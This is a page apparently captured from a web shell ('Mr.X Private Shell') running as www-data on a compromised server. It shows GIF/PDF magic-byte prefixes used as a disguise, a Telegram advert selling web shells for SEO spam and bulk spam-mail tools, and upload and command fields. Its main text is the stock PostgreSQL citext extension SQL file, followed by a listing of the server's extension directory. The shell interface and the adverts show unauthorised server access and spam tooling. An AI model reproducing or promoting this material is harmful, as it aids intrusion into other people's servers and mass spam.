GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
/* contrib/citext/citext--1.4.sql */

-- complain if script is sourced in psql, rather than via CREATE EXTENSION
\echo Use "CREATE EXTENSION citext" to load this file. \quit

--
--  PostgreSQL code for CITEXT.
--
-- Most I/O functions, and a few others, piggyback on the "text" type
-- functions via the implicit cast to text.
--

--
-- Shell type to keep things a bit quieter.
--

CREATE TYPE citext;

--
--  Input and output functions.
--
CREATE FUNCTION citextin(cstring)
RETURNS citext
AS 'textin'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citextout(citext)
RETURNS cstring
AS 'textout'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citextrecv(internal)
RETURNS citext
AS 'textrecv'
LANGUAGE internal STABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citextsend(citext)
RETURNS bytea
AS 'textsend'
LANGUAGE internal STABLE STRICT PARALLEL SAFE;

--
--  The type itself.
--

CREATE TYPE citext (
    INPUT          = citextin,
    OUTPUT         = citextout,
    RECEIVE        = citextrecv,
    SEND           = citextsend,
    INTERNALLENGTH = VARIABLE,
    STORAGE        = extended,
    -- make it a non-preferred member of string type category
    CATEGORY       = 'S',
    PREFERRED      = false,
    COLLATABLE     = true
);

--
-- Type casting functions for those situations where the I/O casts don't
-- automatically kick in.
--

CREATE FUNCTION citext(bpchar)
RETURNS citext
AS 'rtrim1'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext(boolean)
RETURNS citext
AS 'booltext'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext(inet)
RETURNS citext
AS 'network_show'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

--
--  Implicit and assignment type casts.
--

CREATE CAST (citext AS text)    WITHOUT FUNCTION AS IMPLICIT;
CREATE CAST (citext AS varchar) WITHOUT FUNCTION AS IMPLICIT;
CREATE CAST (citext AS bpchar)  WITHOUT FUNCTION AS ASSIGNMENT;
CREATE CAST (text AS citext)    WITHOUT FUNCTION AS ASSIGNMENT;
CREATE CAST (varchar AS citext) WITHOUT FUNCTION AS ASSIGNMENT;
CREATE CAST (bpchar AS citext)  WITH FUNCTION citext(bpchar)  AS ASSIGNMENT;
CREATE CAST (boolean AS citext) WITH FUNCTION citext(boolean) AS ASSIGNMENT;
CREATE CAST (inet AS citext)    WITH FUNCTION citext(inet)    AS ASSIGNMENT;

--
-- Operator Functions.
--

CREATE FUNCTION citext_eq( citext, citext )
RETURNS bool
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext_ne( citext, citext )
RETURNS bool
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext_lt( citext, citext )
RETURNS bool
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext_le( citext, citext )
RETURNS bool
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext_gt( citext, citext )
RETURNS bool
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext_ge( citext, citext )
RETURNS bool
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

--
-- Operators.
--

CREATE OPERATOR = (
    LEFTARG    = CITEXT,
    RIGHTARG   = CITEXT,
    COMMUTATOR = =,
    NEGATOR    = <>,
    PROCEDURE  = citext_eq,
    RESTRICT   = eqsel,
    JOIN       = eqjoinsel,
    HASHES,
    MERGES
);

CREATE OPERATOR <> (
    LEFTARG    = CITEXT,
    RIGHTARG   = CITEXT,
    NEGATOR    = =,
    COMMUTATOR = <>,
    PROCEDURE  = citext_ne,
    RESTRICT   = neqsel,
    JOIN       = neqjoinsel
);

CREATE OPERATOR < (
    LEFTARG    = CITEXT,
    RIGHTARG   = CITEXT,
    NEGATOR    = >=,
    COMMUTATOR = >,
    PROCEDURE  = citext_lt,
    RESTRICT   = scalarltsel,
    JOIN       = scalarltjoinsel
);

CREATE OPERATOR <= (
    LEFTARG    = CITEXT,
    RIGHTARG   = CITEXT,
    NEGATOR    = >,
    COMMUTATOR = >=,
    PROCEDURE  = citext_le,
    RESTRICT   = scalarltsel,
    JOIN       = scalarltjoinsel
);

CREATE OPERATOR >= (
    LEFTARG    = CITEXT,
    RIGHTARG   = CITEXT,
    NEGATOR    = <,
    COMMUTATOR = <=,
    PROCEDURE  = citext_ge,
    RESTRICT   = scalargtsel,
    JOIN       = scalargtjoinsel
);

CREATE OPERATOR > (
    LEFTARG    = CITEXT,
    RIGHTARG   = CITEXT,
    NEGATOR    = <=,
    COMMUTATOR = <,
    PROCEDURE  = citext_gt,
    RESTRICT   = scalargtsel,
    JOIN       = scalargtjoinsel
);

--
-- Support functions for indexing.
--

CREATE FUNCTION citext_cmp(citext, citext)
RETURNS int4
AS 'MODULE_PATHNAME'
LANGUAGE C STRICT IMMUTABLE PARALLEL SAFE;

CREATE FUNCTION citext_hash(citext)
RETURNS int4
AS 'MODULE_PATHNAME'
LANGUAGE C STRICT IMMUTABLE PARALLEL SAFE;

--
-- The btree indexing operator class.
--

CREATE OPERATOR CLASS citext_ops
DEFAULT FOR TYPE CITEXT USING btree AS
    OPERATOR    1   <  (citext, citext),
    OPERATOR    2   <= (citext, citext),
    OPERATOR    3   =  (citext, citext),
    OPERATOR    4   >= (citext, citext),
    OPERATOR    5   >  (citext, citext),
    FUNCTION    1   citext_cmp(citext, citext);

--
-- The hash indexing operator class.
--

CREATE OPERATOR CLASS citext_ops
DEFAULT FOR TYPE citext USING hash AS
    OPERATOR    1   =  (citext, citext),
    FUNCTION    1   citext_hash(citext);

--
-- Aggregates.
--

CREATE FUNCTION citext_smaller(citext, citext)
RETURNS citext
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION citext_larger(citext, citext)
RETURNS citext
AS 'MODULE_PATHNAME'
LANGUAGE C IMMUTABLE STRICT PARALLEL SAFE;

CREATE AGGREGATE min(citext)  (
    SFUNC = citext_smaller,
    STYPE = citext,
    SORTOP = <,
    PARALLEL = SAFE,
    COMBINEFUNC = citext_smaller
);

CREATE AGGREGATE max(citext)  (
    SFUNC = citext_larger,
    STYPE = citext,
    SORTOP = >,
    PARALLEL = SAFE,
    COMBINEFUNC = citext_larger
);

--
-- CITEXT pattern matching.
--

CREATE FUNCTION texticlike(citext, citext)
RETURNS bool AS 'texticlike'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION texticnlike(citext, citext)
RETURNS bool AS 'texticnlike'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION texticregexeq(citext, citext)
RETURNS bool AS 'texticregexeq'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION texticregexne(citext, citext)
RETURNS bool AS 'texticregexne'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE OPERATOR ~ (
    PROCEDURE = texticregexeq,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = !~,
    RESTRICT  = icregexeqsel,
    JOIN      = icregexeqjoinsel
);

CREATE OPERATOR ~* (
    PROCEDURE = texticregexeq,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = !~*,
    RESTRICT  = icregexeqsel,
    JOIN      = icregexeqjoinsel
);

CREATE OPERATOR !~ (
    PROCEDURE = texticregexne,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = ~,
    RESTRICT  = icregexnesel,
    JOIN      = icregexnejoinsel
);

CREATE OPERATOR !~* (
    PROCEDURE = texticregexne,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = ~*,
    RESTRICT  = icregexnesel,
    JOIN      = icregexnejoinsel
);

CREATE OPERATOR ~~ (
    PROCEDURE = texticlike,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = !~~,
    RESTRICT  = iclikesel,
    JOIN      = iclikejoinsel
);

CREATE OPERATOR ~~* (
    PROCEDURE = texticlike,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = !~~*,
    RESTRICT  = iclikesel,
    JOIN      = iclikejoinsel
);

CREATE OPERATOR !~~ (
    PROCEDURE = texticnlike,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = ~~,
    RESTRICT  = icnlikesel,
    JOIN      = icnlikejoinsel
);

CREATE OPERATOR !~~* (
    PROCEDURE = texticnlike,
    LEFTARG   = citext,
    RIGHTARG  = citext,
    NEGATOR   = ~~*,
    RESTRICT  = icnlikesel,
    JOIN      = icnlikejoinsel
);

--
-- Matching citext to text.
--

CREATE FUNCTION texticlike(citext, text)
RETURNS bool AS 'texticlike'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION texticnlike(citext, text)
RETURNS bool AS 'texticnlike'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION texticregexeq(citext, text)
RETURNS bool AS 'texticregexeq'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION texticregexne(citext, text)
RETURNS bool AS 'texticregexne'
LANGUAGE internal IMMUTABLE STRICT PARALLEL SAFE;

CREATE OPERATOR ~ (
    PROCEDURE = texticregexeq,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = !~,
    RESTRICT  = icregexeqsel,
    JOIN      = icregexeqjoinsel
);

CREATE OPERATOR ~* (
    PROCEDURE = texticregexeq,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = !~*,
    RESTRICT  = icregexeqsel,
    JOIN      = icregexeqjoinsel
);

CREATE OPERATOR !~ (
    PROCEDURE = texticregexne,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = ~,
    RESTRICT  = icregexnesel,
    JOIN      = icregexnejoinsel
);

CREATE OPERATOR !~* (
    PROCEDURE = texticregexne,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = ~*,
    RESTRICT  = icregexnesel,
    JOIN      = icregexnejoinsel
);

CREATE OPERATOR ~~ (
    PROCEDURE = texticlike,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = !~~,
    RESTRICT  = iclikesel,
    JOIN      = iclikejoinsel
);

CREATE OPERATOR ~~* (
    PROCEDURE = texticlike,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = !~~*,
    RESTRICT  = iclikesel,
    JOIN      = iclikejoinsel
);

CREATE OPERATOR !~~ (
    PROCEDURE = texticnlike,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = ~~,
    RESTRICT  = icnlikesel,
    JOIN      = icnlikejoinsel
);

CREATE OPERATOR !~~* (
    PROCEDURE = texticnlike,
    LEFTARG   = citext,
    RIGHTARG  = text,
    NEGATOR   = ~~*,
    RESTRICT  = icnlikesel,
    JOIN      = icnlikejoinsel
);

--
-- Matching citext in string comparison functions.
-- XXX TODO Ideally these would be implemented in C.
--

CREATE FUNCTION regexp_match( citext, citext ) RETURNS TEXT[] AS $$
    SELECT pg_catalog.regexp_match( $1::pg_catalog.text, $2::pg_catalog.text, 'i' );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_match( citext, citext, text ) RETURNS TEXT[] AS $$
    SELECT pg_catalog.regexp_match( $1::pg_catalog.text, $2::pg_catalog.text, CASE WHEN pg_catalog.strpos($3, 'c') = 0 THEN  $3 || 'i' ELSE $3 END );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_matches( citext, citext ) RETURNS SETOF TEXT[] AS $$
    SELECT pg_catalog.regexp_matches( $1::pg_catalog.text, $2::pg_catalog.text, 'i' );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE ROWS 1;

CREATE FUNCTION regexp_matches( citext, citext, text ) RETURNS SETOF TEXT[] AS $$
    SELECT pg_catalog.regexp_matches( $1::pg_catalog.text, $2::pg_catalog.text, CASE WHEN pg_catalog.strpos($3, 'c') = 0 THEN  $3 || 'i' ELSE $3 END );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE ROWS 10;

CREATE FUNCTION regexp_replace( citext, citext, text ) returns TEXT AS $$
    SELECT pg_catalog.regexp_replace( $1::pg_catalog.text, $2::pg_catalog.text, $3, 'i');
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_replace( citext, citext, text, text ) returns TEXT AS $$
    SELECT pg_catalog.regexp_replace( $1::pg_catalog.text, $2::pg_catalog.text, $3, CASE WHEN pg_catalog.strpos($4, 'c') = 0 THEN  $4 || 'i' ELSE $4 END);
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_split_to_array( citext, citext ) RETURNS TEXT[] AS $$
    SELECT pg_catalog.regexp_split_to_array( $1::pg_catalog.text, $2::pg_catalog.text, 'i' );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_split_to_array( citext, citext, text ) RETURNS TEXT[] AS $$
    SELECT pg_catalog.regexp_split_to_array( $1::pg_catalog.text, $2::pg_catalog.text, CASE WHEN pg_catalog.strpos($3, 'c') = 0 THEN  $3 || 'i' ELSE $3 END );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_split_to_table( citext, citext ) RETURNS SETOF TEXT AS $$
    SELECT pg_catalog.regexp_split_to_table( $1::pg_catalog.text, $2::pg_catalog.text, 'i' );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION regexp_split_to_table( citext, citext, text ) RETURNS SETOF TEXT AS $$
    SELECT pg_catalog.regexp_split_to_table( $1::pg_catalog.text, $2::pg_catalog.text, CASE WHEN pg_catalog.strpos($3, 'c') = 0 THEN  $3 || 'i' ELSE $3 END );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION strpos( citext, citext ) RETURNS INT AS $$
    SELECT pg_catalog.strpos( pg_catalog.lower( $1::pg_catalog.text ), pg_catalog.lower( $2::pg_catalog.text ) );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION replace( citext, citext, citext ) RETURNS TEXT AS $$
    SELECT pg_catalog.regexp_replace( $1::pg_catalog.text, pg_catalog.regexp_replace($2::pg_catalog.text, '([^a-zA-Z_0-9])', E'\\\\\\1', 'g'), $3::pg_catalog.text, 'gi' );
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION split_part( citext, citext, int ) RETURNS TEXT AS $$
    SELECT (pg_catalog.regexp_split_to_array( $1::pg_catalog.text, pg_catalog.regexp_replace($2::pg_catalog.text, '([^a-zA-Z_0-9])', E'\\\\\\1', 'g'), 'i'))[$3];
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

CREATE FUNCTION translate( citext, citext, text ) RETURNS TEXT AS $$
    SELECT pg_catalog.translate( pg_catalog.translate( $1::pg_catalog.text, pg_catalog.lower($2::pg_catalog.text), $3), pg_catalog.upper($2::pg_catalog.text), $3);
$$ LANGUAGE SQL IMMUTABLE STRICT PARALLEL SAFE;

Filemanager

Name Type Size Permission Actions
adminpack--1.0--1.1.sql File 274 B 0644
adminpack--1.0.sql File 1.5 KB 0644
adminpack--1.1--2.0.sql File 1.64 KB 0644
adminpack--2.0--2.1.sql File 595 B 0644
adminpack.control File 176 B 0644
amcheck--1.0--1.1.sql File 931 B 0644
amcheck--1.0.sql File 704 B 0644
amcheck--1.1--1.2.sql File 705 B 0644
amcheck--1.2--1.3.sql File 852 B 0644
amcheck.control File 154 B 0644
autoinc--1.0.sql File 249 B 0644
autoinc.control File 149 B 0644
bloom--1.0.sql File 666 B 0644
bloom.control File 156 B 0644
btree_gin--1.0--1.1.sql File 1.34 KB 0644
btree_gin--1.0.sql File 24.24 KB 0644
btree_gin--1.1--1.2.sql File 1.41 KB 0644
btree_gin--1.2--1.3.sql File 4.46 KB 0644
btree_gin.control File 175 B 0644
btree_gist--1.0--1.1.sql File 3.65 KB 0644
btree_gist--1.1--1.2.sql File 4.93 KB 0644
btree_gist--1.2--1.3.sql File 1.91 KB 0644
btree_gist--1.2.sql File 40.15 KB 0644
btree_gist--1.3--1.4.sql File 1.89 KB 0644
btree_gist--1.4--1.5.sql File 1.83 KB 0644
btree_gist--1.5--1.6.sql File 13.1 KB 0644
btree_gist.control File 178 B 0644
citext--1.0--1.1.sql File 1 KB 0644
citext--1.1--1.2.sql File 3.34 KB 0644
citext--1.2--1.3.sql File 850 B 0644
citext--1.3--1.4.sql File 668 B 0644
citext--1.4--1.5.sql File 2.23 KB 0644
citext--1.4.sql File 13.15 KB 0644
citext--1.5--1.6.sql File 427 B 0644
citext.control File 173 B 0644
cube--1.0--1.1.sql File 1.56 KB 0644
cube--1.1--1.2.sql File 3.73 KB 0644
cube--1.2--1.3.sql File 365 B 0644
cube--1.2.sql File 9.53 KB 0644
cube--1.3--1.4.sql File 2.33 KB 0644
cube--1.4--1.5.sql File 591 B 0644
cube.control File 157 B 0644
dblink--1.0--1.1.sql File 419 B 0644
dblink--1.1--1.2.sql File 2.77 KB 0644
dblink--1.2.sql File 6.49 KB 0644
dblink.control File 170 B 0644
dict_int--1.0.sql File 711 B 0644
dict_int.control File 173 B 0644
dict_xsyn--1.0.sql File 694 B 0644
dict_xsyn.control File 179 B 0644
earthdistance--1.0--1.1.sql File 671 B 0644
earthdistance--1.1.sql File 3.16 KB 0644
earthdistance.control File 202 B 0644
file_fdw--1.0.sql File 475 B 0644
file_fdw.control File 155 B 0644
fuzzystrmatch--1.0--1.1.sql File 788 B 0644
fuzzystrmatch--1.1.sql File 1.54 KB 0644
fuzzystrmatch.control File 190 B 0644
hstore--1.1--1.2.sql File 1.6 KB 0644
hstore--1.2--1.3.sql File 525 B 0644
hstore--1.3--1.4.sql File 5.19 KB 0644
hstore--1.4--1.5.sql File 409 B 0644
hstore--1.4.sql File 13.44 KB 0644
hstore--1.5--1.6.sql File 455 B 0644
hstore--1.6--1.7.sql File 1.04 KB 0644
hstore--1.7--1.8.sql File 508 B 0644
hstore.control File 173 B 0644
insert_username--1.0.sql File 273 B 0644
insert_username.control File 170 B 0644
intagg--1.0--1.1.sql File 897 B 0644
intagg--1.1.sql File 1.06 KB 0644
intagg.control File 119 B 0644
intarray--1.0--1.1.sql File 1.75 KB 0644
intarray--1.1--1.2.sql File 5.4 KB 0644
intarray--1.2--1.3.sql File 663 B 0644
intarray--1.2.sql File 12 KB 0644
intarray--1.3--1.4.sql File 692 B 0644
intarray--1.4--1.5.sql File 282 B 0644
intarray.control File 191 B 0644
isn--1.0--1.1.sql File 12.04 KB 0644
isn--1.1--1.2.sql File 5.14 KB 0644
isn--1.1.sql File 68.25 KB 0644
isn.control File 175 B 0644
lo--1.0--1.1.sql File 223 B 0644
lo--1.1.sql File 722 B 0644
lo.control File 141 B 0644
ltree--1.0--1.1.sql File 6.19 KB 0644
ltree--1.1--1.2.sql File 5.09 KB 0644
ltree--1.1.sql File 18.92 KB 0644
ltree.control File 170 B 0644
moddatetime--1.0.sql File 261 B 0644
moddatetime.control File 165 B 0644
old_snapshot--1.0.sql File 549 B 0644
old_snapshot.control File 168 B 0644
pageinspect--1.0--1.1.sql File 560 B 0644
pageinspect--1.1--1.2.sql File 562 B 0644
pageinspect--1.2--1.3.sql File 1.9 KB 0644
pageinspect--1.3--1.4.sql File 2.51 KB 0644
pageinspect--1.4--1.5.sql File 1.32 KB 0644
pageinspect--1.5--1.6.sql File 2.2 KB 0644
pageinspect--1.5.sql File 6.12 KB 0644
pageinspect--1.6--1.7.sql File 698 B 0644
pageinspect--1.7--1.8.sql File 1.67 KB 0644
pageinspect--1.8--1.9.sql File 3.32 KB 0644
pageinspect.control File 173 B 0644
pg_buffercache--1.0--1.1.sql File 508 B 0644
pg_buffercache--1.1--1.2.sql File 271 B 0644
pg_buffercache--1.2--1.3.sql File 328 B 0644
pg_buffercache--1.2.sql File 794 B 0644
pg_buffercache.control File 157 B 0644
pg_freespacemap--1.0--1.1.sql File 335 B 0644
pg_freespacemap--1.1--1.2.sql File 377 B 0644
pg_freespacemap--1.1.sql File 899 B 0644
pg_freespacemap.control File 160 B 0644
pg_prewarm--1.0--1.1.sql File 281 B 0644
pg_prewarm--1.1--1.2.sql File 458 B 0644
pg_prewarm--1.1.sql File 475 B 0644
pg_prewarm.control File 139 B 0644
pg_stat_statements--1.0--1.1.sql File 1.22 KB 0644
pg_stat_statements--1.1--1.2.sql File 1.3 KB 0644
pg_stat_statements--1.2--1.3.sql File 1.42 KB 0644
pg_stat_statements--1.3--1.4.sql File 345 B 0644
pg_stat_statements--1.4--1.5.sql File 305 B 0644
pg_stat_statements--1.4.sql File 1.39 KB 0644
pg_stat_statements--1.5--1.6.sql File 376 B 0644
pg_stat_statements--1.6--1.7.sql File 806 B 0644
pg_stat_statements--1.7--1.8.sql File 1.7 KB 0644
pg_stat_statements--1.8--1.9.sql File 2.08 KB 0644
pg_stat_statements.control File 204 B 0644
pg_surgery--1.0.sql File 608 B 0644
pg_surgery.control File 168 B 0644
pg_trgm--1.0--1.1.sql File 536 B 0644
pg_trgm--1.1--1.2.sql File 2.14 KB 0644
pg_trgm--1.2--1.3.sql File 3.42 KB 0644
pg_trgm--1.3--1.4.sql File 2 KB 0644
pg_trgm--1.3.sql File 7.76 KB 0644
pg_trgm--1.4--1.5.sql File 858 B 0644
pg_trgm--1.5--1.6.sql File 418 B 0644
pg_trgm.control File 192 B 0644
pg_visibility--1.0--1.1.sql File 883 B 0644
pg_visibility--1.1--1.2.sql File 833 B 0644
pg_visibility--1.1.sql File 2.76 KB 0644
pg_visibility.control File 186 B 0644
pgcrypto--1.0--1.1.sql File 307 B 0644
pgcrypto--1.1--1.2.sql File 483 B 0644
pgcrypto--1.2--1.3.sql File 2.29 KB 0644
pgcrypto--1.3.sql File 5.57 KB 0644
pgcrypto.control File 152 B 0644
pgrowlocks--1.0--1.1.sql File 651 B 0644
pgrowlocks--1.1--1.2.sql File 253 B 0644
pgrowlocks--1.2.sql File 555 B 0644
pgrowlocks.control File 152 B 0644
pgstattuple--1.0--1.1.sql File 400 B 0644
pgstattuple--1.1--1.2.sql File 1.4 KB 0644
pgstattuple--1.2--1.3.sql File 1.1 KB 0644
pgstattuple--1.3--1.4.sql File 623 B 0644
pgstattuple--1.4--1.5.sql File 5.38 KB 0644
pgstattuple--1.4.sql File 3.68 KB 0644
pgstattuple.control File 147 B 0644
plpgsql--1.0.sql File 658 B 0644
plpgsql.control File 193 B 0644
postgres_fdw--1.0--1.1.sql File 626 B 0644
postgres_fdw--1.0.sql File 507 B 0644
postgres_fdw.control File 172 B 0644
refint--1.0.sql File 343 B 0644
refint.control File 169 B 0644
seg--1.0--1.1.sql File 2.93 KB 0644
seg--1.1--1.2.sql File 360 B 0644
seg--1.1.sql File 7.95 KB 0644
seg--1.2--1.3.sql File 2.29 KB 0644
seg--1.3--1.4.sql File 259 B 0644
seg.control File 187 B 0644
sslinfo--1.0--1.1.sql File 375 B 0644
sslinfo--1.1--1.2.sql File 746 B 0644
sslinfo--1.2.sql File 1.5 KB 0644
sslinfo.control File 146 B 0644
tablefunc--1.0.sql File 2.1 KB 0644
tablefunc.control File 189 B 0644
tcn--1.0.sql File 274 B 0644
tcn.control File 149 B 0644
tsm_system_rows--1.0.sql File 327 B 0644
tsm_system_rows.control File 201 B 0644
tsm_system_time--1.0.sql File 327 B 0644
tsm_system_time.control File 207 B 0644
unaccent--1.0--1.1.sql File 445 B 0644
unaccent--1.1.sql File 910 B 0644
unaccent.control File 172 B 0644
uuid-ossp--1.0--1.1.sql File 688 B 0644
uuid-ossp--1.1.sql File 1.48 KB 0644
uuid-ossp.control File 178 B 0644
xml2--1.0--1.1.sql File 944 B 0644
xml2--1.1.sql File 2 KB 0644
xml2.control File 182 B 0644